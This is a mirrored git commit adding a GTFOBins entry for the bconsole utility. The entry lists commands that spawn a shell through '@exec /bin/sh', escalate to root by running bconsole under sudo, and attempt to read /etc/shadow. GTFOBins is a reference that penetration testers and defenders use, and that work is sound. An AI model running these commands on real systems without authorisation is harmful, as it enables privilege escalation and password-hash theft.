1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Create bconsole

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
PunshLineLama 2022-12-16 11:39:52 -05:00 committed by GitHub
parent 21e0166608
commit 170c1f5db7
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

14
_gtfobins/bconsole.md Normal file
View File

@ -0,0 +1,14 @@
---
functions:
shell:
- code: |
bconsole
@exec /bin/sh
sudo:
- code: |
sudo bconsole
@exec /bin/sh
file-read:
- description: The file is actually parsed and the first wrong line is returned in an error message, thus it may not be suitable for reading arbitrary files.
code: bconsole -c /etc/shadow
---